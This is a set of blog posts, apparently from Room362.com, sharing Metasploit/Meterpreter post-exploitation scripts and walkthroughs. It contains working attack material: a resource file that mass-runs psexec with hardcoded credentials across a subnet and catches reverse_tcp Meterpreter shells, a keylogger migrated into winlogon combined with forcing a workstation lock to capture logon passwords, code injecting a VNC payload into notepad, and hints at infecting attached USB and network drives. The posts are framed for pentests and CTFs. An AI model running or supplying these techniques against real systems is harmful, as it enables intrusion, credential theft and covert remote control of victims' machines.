Room362.com

When you first step on a machine, you want to determine quickly if you are just a user or an administrator. Meterpreter doesn’t have a way to quickly check this. You could drop to a shell, check the local users group “Adminitrators”, and check your user, and correlate any groups that are shared between the outputs. You could do ‘getsystem’ and if one works other than Kitrap0d. You could also just do a ‘ps’ and notice that you can see ‘SYSTEM’ processes.

But, I wanted to make a way that check a bunch of sessions all at once. So I wrote “AmIAdmin.rb” which uses meterpreter’s railgun extension to execute “IsUserAdmin”.

Being that Shell32.dll isn’t included in railgun by default we have to add it. After writing it I decided to add some checks. These checks make sure that each piece of the script isn’t already loaded. It’s a good reference for doing this in the future.

(you can remove the print_status lines if you want the script to be quieter)

Here is the script for your consumption:

if client.platform == "x64/win32"
        print_status "Railgun is currently not supported for x64 bit systems"
        raise Rex::Script::Completed
end

if client.railgun.present? == true
        print_status "Railgun already loaded.. skipping"
else
        print_status "Loading Railgun"
        client.core.use("railgun")
end

if client.railgun.dll['shell32'] == nil
        print_status "Adding Shell32.dll"
        client.railgun.add_dll('shell32','shell32')
else
        print_status "Shell32 already loaded.. skipping"
end

if (client.railgun.shell32.functions['IsUserAnAdmin'] == nil
        print_status "Adding the IsUserAnAdmin function"
        client.railgun.add_function('shell32', 'IsUserAnAdmin', 'BOOL', [])
else
        print_status "IsUserAnAdmin already loaded.. skipping"
end

print_status "Running the IsUserAnAdmin function"
status = client.railgun.shell32.IsUserAnAdmin()

if status["return"] == true then
        print_status "You are an administrator"
else
        print_error "You are not an administrator"
end

Exploit modules inside of metasploit don't have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It's really not much but there are some really juicy pieces of knowledge I learned on the way here.

// The following is a resource file, but instead of just giving you something to download or straight copy and paste, I've broken it up into sections. Also take note of the "setg" which sets the variable globally so that I don't have to set it inside of the psexec module.

use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.114
setg LPORT 80
set ExitOnSession false

exploit -j -z

This first part, while nothing spectacular, sets the multi/handler up before hand so that each run of the exploit module doesn't have to set up and tear down the handler. = fast. The following though is just the setup for the module.

use windows/smb/psexec
set SMBUser Administrator
set SMBPass password123

Here is where it gets interesting though. Windows systems want something in SMBDomain, if they aren't joined to a domain they can take pretty much anything here.

However if they are actually joined to a domain, you either have to have the computer name (which definitely won't play well with a scanner easily) or use domain credentials.

set SMBDomain .

The "." is something every Windows API programmer would know as it's really well documented, but certainly not every Metasploit user. What it means is basically localhost, since SMB won't take either localhost or 127.0.0.1.

Next up, we don't want each run of the exploit module to build the multi/handler and tear it down every single run. That's why we built it first and set DisablePayloadHandler inside of the psexec module.

set DisablePayloadHandler true

Resource files have been able run blocks of ruby in metasploit since revision 8876. By putting the <ruby> html like block identifier you can then use the power of Ruby combined with Rex (Metasploit's API) to do really cool stuff.

More setup, but this time for the ruby portion. Using Metasploit's RangeWalker, we can take all kinds of input, an IP, a CIDR range, and even a line separated file of IP addresses using the "file:" prefix.

<ruby>
require 'rex/socket/range_walker'
rhosts = "192.168.92.0/24"
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|

So, we've included RangeWalker, parsed it, and loaded it into an 'each' for loop.

The "self.run_single" function allows you to send commands like you were outside of the ruby block to msfconsole. We are setting the RHOST to each IP that RangeWalker parsed out, simple right?

self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")

end
</ruby>

 Now, if your credentials worked on any of the IPs you'll have sessions waiting for you.

This can easily be extended with one more loop and a bit of shuffling to make this in to a SMB bruteforcer that accepts hashes!.

Hope you learned a few things. Oh, and just a caveat, this is NOT quiet or stealthy and will probably get you caught on a blackbox pentest, but this is really great for the smash and grab style of  CTF competitions.

Back on June 13th, “Patrick HVE” released RAILGUN:

http://mail.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the the Metasploit trunk with 9709, 9710, 9711 and 9712:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712

Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API dlls:

• iphlpapi
• ws2_32
• kernel32
• ntdll
• user32
• advapi32

(You can find out exactly what functions are available by default in the api.rb file)

It’s also very extensible, it doesn’t have a DLL or function you need? But you can read all about in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

• net use – Shows you what Network drives are connected, but not physical ones
• fsutil fsinfo drives – You must be an administrator to ride this train
• fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

But railgun solves this problem with a really short script:

# Load the Railgun plugin   Update: You no longer need this step
client.core.use("railgun")
# Make the API call to enum drive letters 
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the binary to letters
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
    test = letters[i,1]
    rem = a % (2**(i+1))
    if rem > 0
        drives << test
        a = a - rem
    end
end
print_line("Drives Available = #{drives.inspect}")

Output:
Drives Available = ["A", "C", "D", “P”, “X”]

Save this as a meterpreter script and it’ll print every logical drive attached to the system even as a limited user (that the user can see).

Logical drives include: (hdd, network, mass storage, optical, etc). This opens up the doors to infecting USB sticks and network drives…

JEDI KEYLOGGING:

One of the problems with keylogging is you never know when that person will log in, and if you’re using a client side, they have probably already logged in and you’re hoping they log into a portal or some other password protected site.

Railgun to the rescue again:

# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon
meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter > [*]     winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

# Drop to IRB to initialize railgun and lockout the workstation, forcing the user to use their credentials again.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.core.use("railgun")
=> true
>> client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
>> exit
meterpreter >

Set up “tail –f” going on the log file for the keylogger and then kill the keylogger when you’ve gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >

Hope you have fun with railgun and shoot me an email mubix@hak5.org or leave a comment if you have any other crazy uses for railgun.

Certainly nothing to fuss over, but I've had a fascination with setting my target's wallpaper as sort of a calling card for years now. I've been able to set the registry key (HKCU\Control Panel\Desktop\Wallpaper), but until recently I didn't know how to get it to refresh so that it displayed without forcing the user to log out...

First, is the most important part, selection of the wallpaper. This is my first selection:

 But, it has to be a BMP. So, I created:

metasploit_1024.bmp (2.3 MB)

next run: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d "C:\metasploit_1024.bmp"

and finally the magic:

rundll32.exe user32.dll,UpdatePerUserSystemParameters

thats it, run that, and it'll refresh the settings and display the wallpaper in all of it's glory. But I wouldn't be a metasploit dog if I didn't make it into a meterpreter script:

download: wallpaper.rb

it's definitely not ready to be in the trunk, but it works, just edit each of the options in the file to point at the bmp you want on the victim's wallpaper and it'll be there.

Todo:

[*] Make each parameter an option so there is no text editing involved

[*] Add  the ability to convert other image types on the fly

[*] Figure out how to get the desktop color to refresh with the wallpaper

So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:

Looking at the script I noticed that it created a new connection (two connections outbound). Well it was the perfect excuse to take the newly refurbished portfwd command for a spin.

http://www.room362.com/scripts-and-programs/metasploit/vnc_oneport.rb

Or you can get it via the SVN at Revision 7872

By creating a bind payload instead of a reverse connect we can have the payload listen locally. Then with portfwd command (just like on your home router) we forward a local port to the local host on the remote side, to the binded port. Connecting to the freshly bound port as if we were actually doing everything on the box itself. Creating a new session and a nice beautiful VNC window.

Options:

meterpreter > run vnc_oneport -h

OPTIONS:
    -e <opt>  The process to run and inject into (default: notepad.exe)
    -h        This help menu
    -l <opt>  The local port to listen on via port forwarding (default: 5901)
    -p <opt>  The port on the remote host to bind VNC to (default: randomized)

meterpreter >

Example Run:

[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)

meterpreter > run vnc_oneport

[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207

[*] Host process notepad.exe has PID 532

[*] Allocated memory at address 0x00640000

[*] Writing the VNC stager into memory...

[*] Running Payload

[*] Creating a new thread within notepad.exe to run the VNC stager...

[*] Starting the port forwarding from 5901 => TARGET:1207

[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207

meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)

Connected to RFB server, using protocol version 3.3

No authentication needed

Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"

VNC server default format:

  32 bits per pixel.

  Least significant byte first in each pixel.

  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Using default colormap which is TrueColor.  Pixel format:

  32 bits per pixel.

  Least significant byte first in each pixel.

  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Using shared memory PutImage

Same machine: preferring raw encoding

ShmCleanup called

[*] VNC Server session 2 closed.

meterpreter >                        

[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)
meterpreter > run vnc_oneport
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207
[*] Host process notepad.exe has PID 532
[*] Allocated memory at address 0x00640000
[*] Writing the VNC stager into memory...
[*] Running Payload
[*] Creating a new thread within notepad.exe to run the VNC stager...
[*] Starting the port forwarding from 5901 => TARGET:1207
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207
meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)
Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"VNC server default format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImageSame machine: preferring raw encodingShmCleanup called
[*] VNC Server session 2 closed.

meterpreter >                        

Note:

The forwarded port does not close even if the meterpreter session is ended, so use the following command to close the forward:

meterpreter > portfwd delete -l 5901
[*] Successfully stopped TCP relay on 0.0.0.0:5901

meterpreter >      

(Note to BT4 users: do a `apt-get install vncviewer` before using any of the vnc payloads in Metasploit)

The script utilizes just one of the millions of way you can leverage ‘portfwd’ in your endeavors. But where it gets interesting is the fact that the delivery method for the payload never touches disk. That magic is all credited to HD though. What happens is a new process is created (notepad by default) and the newly created VNC bind payload is injected into it. But, the beauty is that it’s doing local connections via the port forwarding so all you see in TCPView is:

Now it's definitely suspicious that Notepad has any connections at all, but you can use the option `-e` to provide any executable you wish, as long as it's in the path for the system. For examples, look at what's running naturally already.

Plus, you would probably not be using port 4444 for a meterpreter session. But what I wanted to demonstrate with this script is the power of both meterpreter, and port forwarding.

Now it's your turn to make it better. Take a look at the guts, see if anything will help you in your scripting.